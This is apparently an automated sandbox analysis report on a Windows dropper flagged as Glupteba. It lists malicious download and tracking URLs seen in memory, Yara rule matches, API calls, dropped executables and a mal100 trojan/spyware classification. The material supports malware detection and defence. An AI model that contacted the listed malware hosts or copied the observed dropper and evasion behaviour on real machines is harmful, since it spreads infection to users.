Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.765258818.0000000002682000.00000004.00000001.sdmp | String found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com8
Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648721404.0000000002C60000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.760206850.000000000263F000.00000004.00000001.sdmp | String found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.comx
Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: https://fotamene.cominvalid
Source: installer.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: installer.exe, 00000012.00000002.804792262.0000000000401000.00000020.00020000.sdmp | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | String found in binary or memory: https://new.multitimer.fun
Source: multitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | String found in binary or memory: https://new.multitimer.fun/eula
Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | String found in binary or memory: https://new.multitimer.fun/marketing/creative/windows/offer_screen/default?mode=click&track_id=3
Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | String found in binary or memory: https://new.multitimer.fun/marketing/creative/windows/offer_screen/default?mode=click&track_id=3.161
Source: multitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | String found in binary or memory: https://new.multitimer.fun/privacy
Source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp | String found in binary or memory: https://noteach.tech/add.php?windows=
Source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp | String found in binary or memory: https://noteach.tech/software.php?client=
Source: multitimer.exe, 00000004.00000003.794172433.00000000039CA000.00000004.00000001.sdmp | String found in binary or memory: https://pc.inappP
Source: multitimer.exe, 00000004.00000003.803292632.0000000003ADA000.00000004.00000001.sdmp | String found in binary or memory: https://pc.inappPj2
Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | String found in binary or memory: https://pc.inappapiurl.com
Source: multitimer.exe, 00000002.00000002.669011505.0000000002AAE000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.682573139.0000000002777000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.739832286.00000000034D7000.00000004.00000001.sdmp | String found in binary or memory: https://pc.inappapiurl.com/api/v1/buying/redirect/
Source: multitimer.exe, 00000002.00000002.669112631.0000000002B34000.00000004.00000001.sdmp | String found in binary or memory: https://pc.inappapiurl.com/api/v1/buying/redirect/30601988b56f78c9.53290271?sub_id_1=102&sub_id_2=&s
Source: multitimer.exe, 00000002.00000002.669376413.0000000002C2A000.00000004.00000001.sdmp | String found in binary or memory: https://pc.inappapiurl.com/api/v1/tracking/buying
Source: multitimer.exe, 00000002.00000002.669376413.0000000002C2A000.00000004.00000001.sdmp | String found in binary or memory: https://s3.amazonaws.com
Source: multitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmp | String found in binary or memory: https://s3.amazonaws.com/malapps/multitimer.exe
Source: app.exe, 00000013.00000002.878710201.00000000144B0000.00000004.00000001.sdmp | String found in binary or memory: https://sndvoices.comhttps://2makestorage.comhttps://sndvoices.comhttps://2makestorage.comMicrosoft
Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: https://sndvoices.comimage:
Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)couldn
Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648414766.0000000000D3D000.00000004.00000020.sdmp, multitimer.exe, 00000002.00000002.669880622.000000001B456000.00000004.00000001.sdmp, multitimer.exe, 00000004.00000003.780985692.000000001D686000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: safebits.exe, 0000000D.00000002.816810433.000000000075A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            Yara detected Glupteba
            Source: Yara match File source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: app.exe PID: 6452, type: MEMORY
            Source: Yara match File source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_010AE67A: CreateFileW,DeviceIoControl,DeviceIoControl
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_004AF100 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe File created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe File deleted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3524.7055343
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Code function: 1_2_00007FFA359C0E4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Code function: 1_2_00007FFA359C01A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Code function: 1_2_00007FFA359C0280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Code function: 1_2_00007FFA359C07E9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Code function: 1_2_00007FFA359C1F7D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Code function: 1_2_00007FFA359C0B8D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Code function: 1_2_00007FFA359C0BF0
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B5D998
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B44152
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B43DA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B414E0
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B41005
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B57FCD
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B4B7D9
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B460BA
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B44BB8
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 2_2_00007FFA31B56099
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B23DA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B26AA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B20F49
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B24152
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B287C5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B208F6
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B260BA
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B20FE0
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 3_2_00007FFA31B24BB8
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B53DA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B56AA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B54152
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B51005
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B587C5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B514E0
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B508F6
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B560BA
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Code function: 8_2_00007FFA31B54BB8
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Code function: 13_2_00405E2D
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Code function: 13_2_00405CD2
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Code function: 13_2_0045E824
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Code function: 13_2_00494EC0
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Code function: 13_2_00459658
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_010A5551
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01054C71
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01025124
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0105B054
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_010460B5
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_010AE0E2
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_010A2238
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0108D57B
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0103F414
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01038448
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0102A782
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01026660
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0102A9B6
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01040B94
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0103BB92
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0102CBD3
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0102EBD0
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0102ABEA
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0103DA59
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01047D5E
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01040CB8
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01088E2D
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_004323D4
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_004255DC
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_0040E9C4
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: String function: 010221D0 appears 37 times
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: String function: 01043280 appears 31 times
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Code function: String function: 00401272 appears 178 times
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: multitimer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: tpwlxkeo40z.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: safebits.exe.11.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: jdfddn.dll.13.dr Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
            Source: jdfddn.dll.13.dr Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
            Source: vksqeekarkn.exe.15.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: vksqeekarkn.exe.15.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648589527.0000000002A00000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648209813.0000000000882000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBarraNikLik.exe8 vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648630967.0000000002A60000.00000002.00000001.sdmp Binary or memory string: originalfilename vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648630967.0000000002A60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameChichara.exe4 vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648285911.0000000000C5B000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Section loaded: security.dll
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Section loaded: security.dll
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Section loaded: security.dll
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe Section loaded: security.dll
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe Section loaded: security.dll
            Source: 19.2.app.exe.3d72670.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.3.app.exe.45853c0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.3.app.exe.4587620.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.2.app.exe.9e63c0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.2.app.exe.3d76210.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.3.app.exe.4581820.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.2.app.exe.9e2820.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.2.app.exe.9e8620.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: multitimer.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 2mqvpn30gyk.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: AwesomePoolE1.exe.11.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 89C8W4UQT.exe.14.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: uninstaller.exe.14.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: multitimer.exe.1.dr, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 2.0.multitimer.exe.470000.0.unpack, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 2.2.multitimer.exe.470000.0.unpack, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 3.0.multitimer.exe.60000.0.unpack, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 3.2.multitimer.exe.60000.0.unpack, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 2mqvpn30gyk.exe.4.dr, Clasbas.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.multitimer.exe.a60000.0.unpack, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 8.0.multitimer.exe.e10000.0.unpack, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 8.2.multitimer.exe.e10000.0.unpack, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 11.0.multitimer.exe.560000.0.unpack, u0003u2002.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 89C8W4UQT.exe.14.dr, Clasbas.cs Cryptographic APIs: 'CreateDecryptor'
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@75/48@0/18
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_004AF100 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_0041A4DC GetDiskFreeSpaceW
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_004AF9D8 FindResourceW,SizeofResource,LoadResource,LockResource
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe File created: C:\Program Files\89C8W4UQTF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.log
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Mutant created: \Sessions\1\BaseNamedObjects\52b-6f11-481e-99be-b28317af8e3d
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe File created: C:\Users\user\AppData\Local\Temp\B1S206CRD5
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
